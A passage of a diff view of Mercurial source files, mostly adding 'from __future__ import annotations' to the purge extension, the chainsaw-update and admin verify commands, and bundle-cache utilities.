Show More
@@ -1,39 +1,42 | |||
|
1 | 1 | # Copyright (C) 2006 - Marco Barisione <marco@barisione.org> |
|
2 | 2 | # |
|
3 | 3 | # This is a small extension for Mercurial (https://mercurial-scm.org/) |
|
4 | 4 | # that removes files not known to mercurial |
|
5 | 5 | # |
|
6 | 6 | # This program was inspired by the "cvspurge" script contained in CVS |
|
7 | 7 | # utilities (http://www.red-bean.com/cvsutils/). |
|
8 | 8 | # |
|
9 | 9 | # For help on the usage of "hg purge" use: |
|
10 | 10 | # hg help purge |
|
11 | 11 | # |
|
12 | 12 | # This program is free software; you can redistribute it and/or modify |
|
13 | 13 | # it under the terms of the GNU General Public License as published by |
|
14 | 14 | # the Free Software Foundation; either version 2 of the License, or |
|
15 | 15 | # (at your option) any later version. |
|
16 | 16 | # |
|
17 | 17 | # This program is distributed in the hope that it will be useful, |
|
18 | 18 | # but WITHOUT ANY WARRANTY; without even the implied warranty of |
|
19 | 19 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
|
20 | 20 | # GNU General Public License for more details. |
|
21 | 21 | # |
|
22 | 22 | # You should have received a copy of the GNU General Public License |
|
23 | 23 | # along with this program; if not, see <http://www.gnu.org/licenses/>. |
|
24 | 24 | |
|
25 | 25 | '''command to delete untracked files from the working directory (DEPRECATED) |
|
26 | 26 | |
|
27 | 27 | The functionality of this extension has been included in core Mercurial since |
|
28 | 28 | version 5.7. Please use :hg:`purge ...` instead. :hg:`purge --confirm` is now |
|
29 | 29 | the default, unless the extension is enabled for backward compatibility. |
|
30 | 30 | ''' |
|
31 | 31 | |
|
32 | 32 | # This empty extension looks pointless, but core mercurial checks if it's loaded |
|
33 | 33 | # to implement the slightly different behavior documented above. |
|
34 | 34 | |
|
35 | 35 | # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for |
|
36 | 36 | # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should |
|
37 | 37 | # be specifying the version(s) of Mercurial they are tested with, or |
|
38 | 38 | # leave the attribute unspecified. |
|
39 | ||
|
40 | from __future__ import annotations | |
|
41 | ||
|
39 | 42 | testedwith = b'ships-with-hg-core' |
@@ -1,12 +1,15 | |||
|
1 | from __future__ import annotations | |
|
2 | ||
|
3 | ||
|
1 | 4 | def run(): |
|
2 | 5 | from . import demandimport |
|
3 | 6 | |
|
4 | 7 | with demandimport.tracing.log('hg script'): |
|
5 | 8 | demandimport.enable() |
|
6 | 9 | from . import dispatch |
|
7 | 10 | |
|
8 | 11 | dispatch.run() |
|
9 | 12 | |
|
10 | 13 | |
|
11 | 14 | if __name__ == '__main__': |
|
12 | 15 | run() |
@@ -1,226 +1,228 | |||
|
1 | 1 | # chainsaw.py |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2022 Georges Racinet <georges.racinet@octobus.net> |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | 7 | """chainsaw is a collection of single-minded and dangerous tools. (EXPERIMENTAL) |
|
8 | 8 | |
|
9 | 9 | "Don't use a chainsaw to cut your food!" |
|
10 | 10 | |
|
11 | 11 | The chainsaw is a collection of commands that are so much geared towards a |
|
12 | 12 | specific use case in a specific context or environment that they are totally |
|
13 | 13 | inappropriate and **really dangerous** in other contexts. |
|
14 | 14 | |
|
15 | 15 | The help text of each command explicitly summarizes its context of application |
|
16 | 16 | and the wanted end result. |
|
17 | 17 | |
|
18 | 18 | It is recommended to run these commands with the ``HGPLAIN`` environment |
|
19 | 19 | variable (see :hg:`help scripting`). |
|
20 | 20 | """ |
|
21 | 21 | |
|
22 | from __future__ import annotations | |
|
23 | ||
|
22 | 24 | import shutil |
|
23 | 25 | |
|
24 | 26 | from ..i18n import _ |
|
25 | 27 | from .. import ( |
|
26 | 28 | cmdutil, |
|
27 | 29 | commands, |
|
28 | 30 | error, |
|
29 | 31 | localrepo, |
|
30 | 32 | registrar, |
|
31 | 33 | ) |
|
32 | 34 | from ..utils import ( |
|
33 | 35 | urlutil, |
|
34 | 36 | ) |
|
35 | 37 | |
|
36 | 38 | cmdtable = {} |
|
37 | 39 | command = registrar.command(cmdtable) |
|
38 | 40 | |
|
39 | 41 | |
|
40 | 42 | @command( |
|
41 | 43 | b'admin::chainsaw-update', |
|
42 | 44 | [ |
|
43 | 45 | ( |
|
44 | 46 | b'', |
|
45 | 47 | b'purge-unknown', |
|
46 | 48 | True, |
|
47 | 49 | _( |
|
48 | 50 | b'Remove unversioned files before update. Disabling this can ' |
|
49 | 51 | b'in some cases interfere with the update.' |
|
50 | 52 | b'See also :hg:`purge`.' |
|
51 | 53 | ), |
|
52 | 54 | ), |
|
53 | 55 | ( |
|
54 | 56 | b'', |
|
55 | 57 | b'purge-ignored', |
|
56 | 58 | True, |
|
57 | 59 | _( |
|
58 | 60 | b'Remove ignored files before update. Disable this for ' |
|
59 | 61 | b'instance to reuse previous compiler object files. ' |
|
60 | 62 | b'See also :hg:`purge`.' |
|
61 | 63 | ), |
|
62 | 64 | ), |
|
63 | 65 | ( |
|
64 | 66 | b'', |
|
65 | 67 | b'rev', |
|
66 | 68 | b'', |
|
67 | 69 | _(b'revision to update to'), |
|
68 | 70 | ), |
|
69 | 71 | ( |
|
70 | 72 | b'', |
|
71 | 73 | b'source', |
|
72 | 74 | b'', |
|
73 | 75 | _(b'repository to clone from'), |
|
74 | 76 | ), |
|
75 | 77 | ( |
|
76 | 78 | b'', |
|
77 | 79 | b'dest', |
|
78 | 80 | b'', |
|
79 | 81 | _(b'repository to update to REV (possibly cloning)'), |
|
80 | 82 | ), |
|
81 | 83 | ( |
|
82 | 84 | b'', |
|
83 | 85 | b'initial-clone-minimal', |
|
84 | 86 | False, |
|
85 | 87 | _( |
|
86 | 88 | b'Pull only the prescribed revision upon initial cloning. ' |
|
87 | 89 | b'This has the side effect of ignoring clone-bundles, ' |
|
88 | 90 | b'which if often slower on the client side and stressful ' |
|
89 | 91 | b'to the server than applying available clone bundles.' |
|
90 | 92 | ), |
|
91 | 93 | ), |
|
92 | 94 | ], |
|
93 | 95 | _( |
|
94 | 96 | b'hg admin::chainsaw-update [OPTION] --rev REV --source SOURCE --dest DEST' |
|
95 | 97 | ), |
|
96 | 98 | helpbasic=True, |
|
97 | 99 | norepo=True, |
|
98 | 100 | ) |
|
99 | 101 | def update(ui, **opts): |
|
100 | 102 | """pull and update to a given revision, no matter what, (EXPERIMENTAL) |
|
101 | 103 | |
|
102 | 104 | Context of application: *some* Continuous Integration (CI) systems, |
|
103 | 105 | packaging or deployment tools. |
|
104 | 106 | |
|
105 | 107 | Wanted end result: local repository at the given REPO_PATH, having the |
|
106 | 108 | latest changes to the given revision and with a clean working directory |
|
107 | 109 | updated at the given revision. |
|
108 | 110 | |
|
109 | 111 | chainsaw-update pulls from one source, then updates the working directory |
|
110 | 112 | to the given revision, overcoming anything that would stand in the way. |
|
111 | 113 | |
|
112 | 114 | By default, it will: |
|
113 | 115 | |
|
114 | 116 | - clone if the local repo does not exist yet, **removing any directory |
|
115 | 117 | at the given path** that would not be a Mercurial repository. |
|
116 | 118 | The initial clone is full by default, so that clonebundles can be |
|
117 | 119 | applied. Use the --initial-clone-minimal flag to avoid this. |
|
118 | 120 | - break locks if needed, leading to possible corruption if there |
|
119 | 121 | is a concurrent write access. |
|
120 | 122 | - perform recovery actions if needed |
|
121 | 123 | - revert any local modification. |
|
122 | 124 | - purge unknown and ignored files. |
|
123 | 125 | - go as far as to reclone if everything else failed (not implemented yet). |
|
124 | 126 | |
|
125 | 127 | DO NOT use it for anything else than performing a series |
|
126 | 128 | of unattended updates, with full exclusive repository access each time |
|
127 | 129 | and without any other local work than running build scripts. |
|
128 | 130 | In case the local repository is a share (see :hg:`help share`), exclusive |
|
129 | 131 | write access to the share source is also mandatory. |
|
130 | 132 | |
|
131 | 133 | It is recommended to run these commands with the ``HGPLAIN`` environment |
|
132 | 134 | variable (see :hg:`scripting`). |
|
133 | 135 | |
|
134 | 136 | Motivation: in Continuous Integration and Delivery systems (CI/CD), the |
|
135 | 137 | occasional remnant or bogus lock are common sources of waste of time (both |
|
136 | 138 | working time and calendar time). CI/CD scripts tend to grow with counter- |
|
137 | 139 | measures, often done in urgency. Also, whilst it is neat to keep |
|
138 | 140 | repositories from one job to the next (especially with large |
|
139 | 141 | repositories), an exceptional recloning is better than missing a release |
|
140 | 142 | deadline. |
|
141 | 143 | """ |
|
142 | 144 | rev = opts['rev'] |
|
143 | 145 | source = opts['source'] |
|
144 | 146 | repo_path = opts['dest'] |
|
145 | 147 | if not rev: |
|
146 | 148 | raise error.InputError(_(b'specify a target revision with --rev')) |
|
147 | 149 | if not source: |
|
148 | 150 | raise error.InputError(_(b'specify a pull path with --source')) |
|
149 | 151 | if not repo_path: |
|
150 | 152 | raise error.InputError(_(b'specify a repo path with --dest')) |
|
151 | 153 | repo_path = urlutil.urllocalpath(repo_path) |
|
152 | 154 | |
|
153 | 155 | try: |
|
154 | 156 | repo = localrepo.instance(ui, repo_path, create=False) |
|
155 | 157 | repo_created = False |
|
156 | 158 | ui.status(_(b'loaded repository at "%s"\n' % repo_path)) |
|
157 | 159 | except error.RepoError: |
|
158 | 160 | try: |
|
159 | 161 | shutil.rmtree(repo_path) |
|
160 | 162 | except FileNotFoundError: |
|
161 | 163 | ui.status(_(b'no such directory: "%s"\n' % repo_path)) |
|
162 | 164 | else: |
|
163 | 165 | ui.status( |
|
164 | 166 | _( |
|
165 | 167 | b'removed non-repository file or directory ' |
|
166 | 168 | b'at "%s"' % repo_path |
|
167 | 169 | ) |
|
168 | 170 | ) |
|
169 | 171 | |
|
170 | 172 | ui.status(_(b'creating repository at "%s"\n' % repo_path)) |
|
171 | 173 | repo = localrepo.instance(ui, repo_path, create=True) |
|
172 | 174 | repo_created = True |
|
173 | 175 | |
|
174 | 176 | if repo.svfs.tryunlink(b'lock'): |
|
175 | 177 | ui.status(_(b'had to break store lock\n')) |
|
176 | 178 | if repo.vfs.tryunlink(b'wlock'): |
|
177 | 179 | ui.status(_(b'had to break working copy lock\n')) |
|
178 | 180 | # If another process relock after the breacking above, the next locking |
|
179 | 181 | # will have to wait. |
|
180 | 182 | with repo.wlock(), repo.lock(): |
|
181 | 183 | ui.status(_(b'recovering after interrupted transaction, if any\n')) |
|
182 | 184 | repo.recover() |
|
183 | 185 | |
|
184 | 186 | ui.status(_(b'pulling from %s\n') % source) |
|
185 | 187 | if repo_created and not opts.get('initial_clone_minimal'): |
|
186 | 188 | pull_revs = [] |
|
187 | 189 | else: |
|
188 | 190 | pull_revs = [rev] |
|
189 | 191 | overrides = {(b'ui', b'quiet'): True} |
|
190 | 192 | with repo.ui.configoverride(overrides, b'chainsaw-update'): |
|
191 | 193 | pull = cmdutil.findcmd(b'pull', commands.table)[1][0] |
|
192 | 194 | ret = pull( |
|
193 | 195 | repo.ui, |
|
194 | 196 | repo, |
|
195 | 197 | source, |
|
196 | 198 | rev=pull_revs, |
|
197 | 199 | remote_hidden=False, |
|
198 | 200 | ) |
|
199 | 201 | if ret: |
|
200 | 202 | return ret |
|
201 | 203 | |
|
202 | 204 | purge = cmdutil.findcmd(b'purge', commands.table)[1][0] |
|
203 | 205 | ret = purge( |
|
204 | 206 | ui, |
|
205 | 207 | repo, |
|
206 | 208 | dirs=True, |
|
207 | 209 | all=opts.get('purge_ignored'), |
|
208 | 210 | files=opts.get('purge_unknown'), |
|
209 | 211 | confirm=False, |
|
210 | 212 | ) |
|
211 | 213 | if ret: |
|
212 | 214 | return ret |
|
213 | 215 | |
|
214 | 216 | ui.status(_(b'updating to revision \'%s\'\n') % rev) |
|
215 | 217 | update = cmdutil.findcmd(b'update', commands.table)[1][0] |
|
216 | 218 | ret = update(ui, repo, rev=rev, clean=True) |
|
217 | 219 | if ret: |
|
218 | 220 | return ret |
|
219 | 221 | |
|
220 | 222 | ui.status( |
|
221 | 223 | _( |
|
222 | 224 | b'chainsaw-update to revision \'%s\' ' |
|
223 | 225 | b'for repository at \'%s\' done\n' |
|
224 | 226 | ) |
|
225 | 227 | % (rev, repo.root) |
|
226 | 228 | ) |
@@ -1,340 +1,342 | |||
|
1 | 1 | # admin/verify.py - better repository integrity checking for Mercurial |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2023 Octobus <contact@octobus.net> |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | 7 | |
|
8 | from __future__ import annotations | |
|
9 | ||
|
8 | 10 | import collections |
|
9 | 11 | import copy |
|
10 | 12 | import functools |
|
11 | 13 | |
|
12 | 14 | from ..i18n import _ |
|
13 | 15 | from .. import error, pycompat, registrar, requirements |
|
14 | 16 | from ..utils import stringutil |
|
15 | 17 | |
|
16 | 18 | |
|
17 | 19 | verify_table = {} |
|
18 | 20 | verify_alias_table = {} |
|
19 | 21 | check = registrar.verify_check(verify_table, verify_alias_table) |
|
20 | 22 | |
|
21 | 23 | |
|
22 | 24 | # Use this to declare options/aliases in the middle of the hierarchy. |
|
23 | 25 | # Checks like these are not run themselves and cannot have a body. |
|
24 | 26 | # For an example, see the `revlogs` check. |
|
25 | 27 | def noop_func(*args, **kwargs): |
|
26 | 28 | return |
|
27 | 29 | |
|
28 | 30 | |
|
29 | 31 | @check(b"working-copy.dirstate", alias=b"dirstate") |
|
30 | 32 | def check_dirstate(ui, repo, **options): |
|
31 | 33 | ui.status(_(b"checking dirstate\n")) |
|
32 | 34 | |
|
33 | 35 | parent1, parent2 = repo.dirstate.parents() |
|
34 | 36 | m1 = repo[parent1].manifest() |
|
35 | 37 | m2 = repo[parent2].manifest() |
|
36 | 38 | errors = 0 |
|
37 | 39 | |
|
38 | 40 | is_narrow = requirements.NARROW_REQUIREMENT in repo.requirements |
|
39 | 41 | narrow_matcher = repo.narrowmatch() if is_narrow else None |
|
40 | 42 | for err in repo.dirstate.verify(m1, m2, parent1, narrow_matcher): |
|
41 | 43 | ui.warn(err) |
|
42 | 44 | errors += 1 |
|
43 | 45 | |
|
44 | 46 | return errors |
|
45 | 47 | |
|
46 | 48 | |
|
47 | 49 | # Tree of all checks and their associated function |
|
48 | 50 | pyramid = {} |
|
49 | 51 | |
|
50 | 52 | |
|
51 | 53 | def build_pyramid(table, full_pyramid): |
|
52 | 54 | """Create a pyramid of checks of the registered checks. |
|
53 | 55 | It is a name-based hierarchy that can be arbitrarily nested.""" |
|
54 | 56 | for entry, func in sorted(table.items(), key=lambda x: x[0], reverse=True): |
|
55 | 57 | cursor = full_pyramid |
|
56 | 58 | levels = entry.split(b".") |
|
57 | 59 | for level in levels[:-1]: |
|
58 | 60 | current_node = cursor.setdefault(level, {}) |
|
59 | 61 | cursor = current_node |
|
60 | 62 | if cursor.get(levels[-1]) is None: |
|
61 | 63 | cursor[levels[-1]] = (entry, func) |
|
62 | 64 | elif func is not noop_func: |
|
63 | 65 | m = b"intermediate checks need to use `verify.noop_func`" |
|
64 | 66 | raise error.ProgrammingError(m) |
|
65 | 67 | |
|
66 | 68 | |
|
67 | 69 | def find_checks(name, table=None, alias_table=None, full_pyramid=None): |
|
68 | 70 | """Find all checks for a given name and returns a dict of |
|
69 | 71 | (qualified_check_name, check_function) |
|
70 | 72 | |
|
71 | 73 | # Examples |
|
72 | 74 | |
|
73 | 75 | Using a full qualified name: |
|
74 | 76 | "working-copy.dirstate" -> { |
|
75 | 77 | "working-copy.dirstate": CF, |
|
76 | 78 | } |
|
77 | 79 | |
|
78 | 80 | Using a *prefix* of a qualified name: |
|
79 | 81 | "store.revlogs" -> { |
|
80 | 82 | "store.revlogs.changelog": CF, |
|
81 | 83 | "store.revlogs.manifestlog": CF, |
|
82 | 84 | "store.revlogs.filelog": CF, |
|
83 | 85 | } |
|
84 | 86 | |
|
85 | 87 | Using a defined alias: |
|
86 | 88 | "revlogs" -> { |
|
87 | 89 | "store.revlogs.changelog": CF, |
|
88 | 90 | "store.revlogs.manifestlog": CF, |
|
89 | 91 | "store.revlogs.filelog": CF, |
|
90 | 92 | } |
|
91 | 93 | |
|
92 | 94 | Using something that is none of the above will be an error. |
|
93 | 95 | """ |
|
94 | 96 | if table is None: |
|
95 | 97 | table = verify_table |
|
96 | 98 | if alias_table is None: |
|
97 | 99 | alias_table = verify_alias_table |
|
98 | 100 | |
|
99 | 101 | if name == b"full": |
|
100 | 102 | return table |
|
101 | 103 | checks = {} |
|
102 | 104 | |
|
103 | 105 | # is it a full name? |
|
104 | 106 | check = table.get(name) |
|
105 | 107 | |
|
106 | 108 | if check is None: |
|
107 | 109 | # is it an alias? |
|
108 | 110 | qualified_name = alias_table.get(name) |
|
109 | 111 | if qualified_name is not None: |
|
110 | 112 | name = qualified_name |
|
111 | 113 | check = table.get(name) |
|
112 | 114 | else: |
|
113 | 115 | split = name.split(b".", 1) |
|
114 | 116 | if len(split) == 2: |
|
115 | 117 | # split[0] can be an alias |
|
116 | 118 | qualified_name = alias_table.get(split[0]) |
|
117 | 119 | if qualified_name is not None: |
|
118 | 120 | name = b"%s.%s" % (qualified_name, split[1]) |
|
119 | 121 | check = table.get(name) |
|
120 | 122 | else: |
|
121 | 123 | qualified_name = name |
|
122 | 124 | |
|
123 | 125 | # Maybe it's a subtree in the check hierarchy that does not |
|
124 | 126 | # have an explicit alias. |
|
125 | 127 | levels = name.split(b".") |
|
126 | 128 | if full_pyramid is not None: |
|
127 | 129 | if not full_pyramid: |
|
128 | 130 | build_pyramid(table, full_pyramid) |
|
129 | 131 | |
|
130 | 132 | pyramid.clear() |
|
131 | 133 | pyramid.update(full_pyramid.items()) |
|
132 | 134 | else: |
|
133 | 135 | build_pyramid(table, pyramid) |
|
134 | 136 | |
|
135 | 137 | subtree = pyramid |
|
136 | 138 | # Find subtree |
|
137 | 139 | for level in levels: |
|
138 | 140 | subtree = subtree.get(level) |
|
139 | 141 | if subtree is None: |
|
140 | 142 | hint = error.getsimilar(list(alias_table) + list(table), name) |
|
141 | 143 | hint = error.similarity_hint(hint) |
|
142 | 144 | |
|
143 | 145 | raise error.InputError(_(b"unknown check %s" % name), hint=hint) |
|
144 | 146 | |
|
145 | 147 | # Get all checks in that subtree |
|
146 | 148 | if isinstance(subtree, dict): |
|
147 | 149 | stack = list(subtree.items()) |
|
148 | 150 | while stack: |
|
149 | 151 | current_name, entry = stack.pop() |
|
150 | 152 | if isinstance(entry, dict): |
|
151 | 153 | stack.extend(entry.items()) |
|
152 | 154 | else: |
|
153 | 155 | # (qualified_name, func) |
|
154 | 156 | checks[entry[0]] = entry[1] |
|
155 | 157 | else: |
|
156 | 158 | checks[name] = check |
|
157 | 159 | |
|
158 | 160 | return checks |
|
159 | 161 | |
|
160 | 162 | |
|
161 | 163 | def pass_options( |
|
162 | 164 | ui, |
|
163 | 165 | checks, |
|
164 | 166 | options, |
|
165 | 167 | table=None, |
|
166 | 168 | alias_table=None, |
|
167 | 169 | full_pyramid=None, |
|
168 | 170 | ): |
|
169 | 171 | """Given a dict of checks (fully qualified name to function), and a list |
|
170 | 172 | of options as given by the user, pass each option down to the right check |
|
171 | 173 | function.""" |
|
172 | 174 | ui.debug(b"passing options to check functions\n") |
|
173 | 175 | to_modify = collections.defaultdict(dict) |
|
174 | 176 | |
|
175 | 177 | if not checks: |
|
176 | 178 | raise error.Error(_(b"`checks` required")) |
|
177 | 179 | |
|
178 | 180 | for option in sorted(options): |
|
179 | 181 | split = option.split(b":") |
|
180 | 182 | hint = _( |
|
181 | 183 | b"syntax is 'check:option=value', " |
|
182 | 184 | b"eg. revlogs.changelog:copies=yes" |
|
183 | 185 | ) |
|
184 | 186 | option_error = error.InputError( |
|
185 | 187 | _(b"invalid option '%s'") % option, hint=hint |
|
186 | 188 | ) |
|
187 | 189 | if len(split) != 2: |
|
188 | 190 | raise option_error |
|
189 | 191 | |
|
190 | 192 | check_name, option_value = split |
|
191 | 193 | if not option_value: |
|
192 | 194 | raise option_error |
|
193 | 195 | |
|
194 | 196 | split = option_value.split(b"=") |
|
195 | 197 | if len(split) != 2: |
|
196 | 198 | raise option_error |
|
197 | 199 | |
|
198 | 200 | option_name, value = split |
|
199 | 201 | if not value: |
|
200 | 202 | raise option_error |
|
201 | 203 | |
|
202 | 204 | path = b"%s:%s" % (check_name, option_name) |
|
203 | 205 | |
|
204 | 206 | matching_checks = find_checks( |
|
205 | 207 | check_name, |
|
206 | 208 | table=table, |
|
207 | 209 | alias_table=alias_table, |
|
208 | 210 | full_pyramid=full_pyramid, |
|
209 | 211 | ) |
|
210 | 212 | for name in matching_checks: |
|
211 | 213 | check = checks.get(name) |
|
212 | 214 | if check is None: |
|
213 | 215 | msg = _(b"specified option '%s' for unselected check '%s'\n") |
|
214 | 216 | raise error.InputError(msg % (name, option_name)) |
|
215 | 217 | |
|
216 | 218 | assert hasattr(check, "func") # help Pytype |
|
217 | 219 | |
|
218 | 220 | if not hasattr(check.func, "options"): |
|
219 | 221 | raise error.InputError( |
|
220 | 222 | _(b"check '%s' has no option '%s'") % (name, option_name) |
|
221 | 223 | ) |
|
222 | 224 | |
|
223 | 225 | try: |
|
224 | 226 | matching_option = next( |
|
225 | 227 | (o for o in check.func.options if o[0] == option_name) |
|
226 | 228 | ) |
|
227 | 229 | except StopIteration: |
|
228 | 230 | raise error.InputError( |
|
229 | 231 | _(b"check '%s' has no option '%s'") % (name, option_name) |
|
230 | 232 | ) |
|
231 | 233 | |
|
232 | 234 | # transform the argument from cli string to the expected Python type |
|
233 | 235 | _name, typ, _docstring = matching_option |
|
234 | 236 | |
|
235 | 237 | as_typed = None |
|
236 | 238 | if isinstance(typ, bool): |
|
237 | 239 | as_bool = stringutil.parsebool(value) |
|
238 | 240 | if as_bool is None: |
|
239 | 241 | raise error.InputError( |
|
240 | 242 | _(b"'%s' is not a boolean ('%s')") % (path, value) |
|
241 | 243 | ) |
|
242 | 244 | as_typed = as_bool |
|
243 | 245 | elif isinstance(typ, list): |
|
244 | 246 | as_list = stringutil.parselist(value) |
|
245 | 247 | if as_list is None: |
|
246 | 248 | raise error.InputError( |
|
247 | 249 | _(b"'%s' is not a list ('%s')") % (path, value) |
|
248 | 250 | ) |
|
249 | 251 | as_typed = as_list |
|
250 | 252 | else: |
|
251 | 253 | raise error.ProgrammingError(b"unsupported type %s", type(typ)) |
|
252 | 254 | |
|
253 | 255 | if option_name in to_modify[name]: |
|
254 | 256 | raise error.InputError( |
|
255 | 257 | _(b"duplicated option '%s' for '%s'") % (option_name, name) |
|
256 | 258 | ) |
|
257 | 259 | else: |
|
258 | 260 | assert as_typed is not None |
|
259 | 261 | to_modify[name][option_name] = as_typed |
|
260 | 262 | |
|
261 | 263 | # Manage case where a check is set but without command line options |
|
262 | 264 | # it will later be set with default check options values |
|
263 | 265 | for name, f in checks.items(): |
|
264 | 266 | if name not in to_modify: |
|
265 | 267 | to_modify[name] = {} |
|
266 | 268 | |
|
267 | 269 | # Merge default options with command line options |
|
268 | 270 | for check_name, cmd_options in to_modify.items(): |
|
269 | 271 | check = checks.get(check_name) |
|
270 | 272 | func = checks[check_name] |
|
271 | 273 | merged_options = {} |
|
272 | 274 | # help Pytype |
|
273 | 275 | assert check is not None |
|
274 | 276 | assert check.func is not None |
|
275 | 277 | assert hasattr(check.func, "options") |
|
276 | 278 | |
|
277 | 279 | if check.func.options: |
|
278 | 280 | # copy the default value in case it's mutable (list, etc.) |
|
279 | 281 | merged_options = { |
|
280 | 282 | o[0]: copy.deepcopy(o[1]) for o in check.func.options |
|
281 | 283 | } |
|
282 | 284 | if cmd_options: |
|
283 | 285 | for k, v in cmd_options.items(): |
|
284 | 286 | merged_options[k] = v |
|
285 | 287 | options = pycompat.strkwargs(merged_options) |
|
286 | 288 | checks[check_name] = functools.partial(func, **options) |
|
287 | 289 | ui.debug(b"merged options for '%s': '%r'\n" % (check_name, options)) |
|
288 | 290 | |
|
289 | 291 | return checks |
|
290 | 292 | |
|
291 | 293 | |
|
292 | 294 | def get_checks( |
|
293 | 295 | repo, |
|
294 | 296 | ui, |
|
295 | 297 | names=None, |
|
296 | 298 | options=None, |
|
297 | 299 | table=None, |
|
298 | 300 | alias_table=None, |
|
299 | 301 | full_pyramid=None, |
|
300 | 302 | ): |
|
301 | 303 | """Given a list of function names and optionally a list of |
|
302 | 304 | options, return matched checks with merged options (command line options |
|
303 | 305 | values take precedence on default ones) |
|
304 | 306 | |
|
305 | 307 | It runs find checks, then resolve options and returns a dict of matched |
|
306 | 308 | functions with resolved options. |
|
307 | 309 | """ |
|
308 | 310 | funcs = {} |
|
309 | 311 | |
|
310 | 312 | if names is None: |
|
311 | 313 | names = [] |
|
312 | 314 | |
|
313 | 315 | if options is None: |
|
314 | 316 | options = [] |
|
315 | 317 | |
|
316 | 318 | # find checks |
|
317 | 319 | for name in names: |
|
318 | 320 | matched = find_checks( |
|
319 | 321 | name, |
|
320 | 322 | table=table, |
|
321 | 323 | alias_table=alias_table, |
|
322 | 324 | full_pyramid=full_pyramid, |
|
323 | 325 | ) |
|
324 | 326 | matched_names = b", ".join(matched) |
|
325 | 327 | ui.debug(b"found checks '%s' for name '%s'\n" % (matched_names, name)) |
|
326 | 328 | funcs.update(matched) |
|
327 | 329 | |
|
328 | 330 | funcs = {n: functools.partial(f, ui, repo) for n, f in funcs.items()} |
|
329 | 331 | |
|
330 | 332 | # resolve options |
|
331 | 333 | checks = pass_options( |
|
332 | 334 | ui, |
|
333 | 335 | funcs, |
|
334 | 336 | options, |
|
335 | 337 | table=table, |
|
336 | 338 | alias_table=alias_table, |
|
337 | 339 | full_pyramid=full_pyramid, |
|
338 | 340 | ) |
|
339 | 341 | |
|
340 | 342 | return checks |
@@ -1,50 +1,52 | |||
|
1 | 1 | # admin_commands.py - command processing for admin* commands |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2022 Mercurial Developers |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | 7 | |
|
8 | from __future__ import annotations | |
|
9 | ||
|
8 | 10 | from .i18n import _ |
|
9 | 11 | from .admin import chainsaw, verify |
|
10 | 12 | from . import error, registrar, transaction |
|
11 | 13 | |
|
12 | 14 | |
|
13 | 15 | table = {} |
|
14 | 16 | table.update(chainsaw.command._table) |
|
15 | 17 | command = registrar.command(table) |
|
16 | 18 | |
|
17 | 19 | |
|
18 | 20 | @command( |
|
19 | 21 | b'admin::verify', |
|
20 | 22 | [ |
|
21 | 23 | (b'c', b'check', [], _(b'add a check'), _(b'CHECK')), |
|
22 | 24 | (b'o', b'option', [], _(b'pass an option to a check'), _(b'OPTION')), |
|
23 | 25 | ], |
|
24 | 26 | helpcategory=command.CATEGORY_MAINTENANCE, |
|
25 | 27 | ) |
|
26 | 28 | def admin_verify(ui, repo, **opts): |
|
27 | 29 | """verify the integrity of the repository |
|
28 | 30 | |
|
29 | 31 | Alternative UI to `hg verify` with a lot more control over the |
|
30 | 32 | verification process and better error reporting. |
|
31 | 33 | """ |
|
32 | 34 | |
|
33 | 35 | if not repo.url().startswith(b'file:'): |
|
34 | 36 | raise error.Abort(_(b"cannot verify bundle or remote repos")) |
|
35 | 37 | |
|
36 | 38 | if transaction.has_abandoned_transaction(repo): |
|
37 | 39 | ui.warn(_(b"abandoned transaction found - run hg recover\n")) |
|
38 | 40 | |
|
39 | 41 | checks = opts.get("check", []) |
|
40 | 42 | options = opts.get("option", []) |
|
41 | 43 | |
|
42 | 44 | funcs = verify.get_checks(repo, ui, names=checks, options=options) |
|
43 | 45 | |
|
44 | 46 | ui.status(_(b"running %d checks\n") % len(funcs)) |
|
45 | 47 | # Done in two times so the execution is separated from the resolving step |
|
46 | 48 | for name, func in sorted(funcs.items(), key=lambda x: x[0]): |
|
47 | 49 | ui.status(_(b"running %s\n") % name) |
|
48 | 50 | errors = func() |
|
49 | 51 | if errors: |
|
50 | 52 | ui.warn(_(b"found %d errors\n") % errors) |
@@ -1,568 +1,570 | |||
|
1 | 1 | # bundlecaches.py - utility to deal with pre-computed bundle for servers |
|
2 | 2 | # |
|
3 | 3 | # This software may be used and distributed according to the terms of the |
|
4 | 4 | # GNU General Public License version 2 or any later version. |
|
5 | 5 | |
|
6 | from __future__ import annotations | |
|
7 | ||
|
6 | 8 | import collections |
|
7 | 9 | import typing |
|
8 | 10 | |
|
9 | 11 | from typing import ( |
|
10 | 12 | Dict, |
|
11 | 13 | Union, |
|
12 | 14 | cast, |
|
13 | 15 | ) |
|
14 | 16 | |
|
15 | 17 | from .i18n import _ |
|
16 | 18 | |
|
17 | 19 | from .thirdparty import attr |
|
18 | 20 | |
|
19 | 21 | # Force pytype to use the non-vendored package |
|
20 | 22 | if typing.TYPE_CHECKING: |
|
21 | 23 | # noinspection PyPackageRequirements |
|
22 | 24 | import attr |
|
23 | 25 | |
|
24 | 26 | from . import ( |
|
25 | 27 | error, |
|
26 | 28 | requirements as requirementsmod, |
|
27 | 29 | sslutil, |
|
28 | 30 | util, |
|
29 | 31 | ) |
|
30 | 32 | from .utils import stringutil |
|
31 | 33 | |
|
32 | 34 | urlreq = util.urlreq |
|
33 | 35 | |
|
34 | 36 | BUNDLE_CACHE_DIR = b'bundle-cache' |
|
35 | 37 | CB_MANIFEST_FILE = b'clonebundles.manifest' |
|
36 | 38 | CLONEBUNDLESCHEME = b"peer-bundle-cache://" |
|
37 | 39 | |
|
38 | 40 | |
|
39 | 41 | def get_manifest(repo) -> bytes: |
|
40 | 42 | """get the bundle manifest to be served to a client from a server""" |
|
41 | 43 | raw_text = repo.vfs.tryread(CB_MANIFEST_FILE) |
|
42 | 44 | entries = [e.split(b' ', 1) for e in raw_text.splitlines()] |
|
43 | 45 | |
|
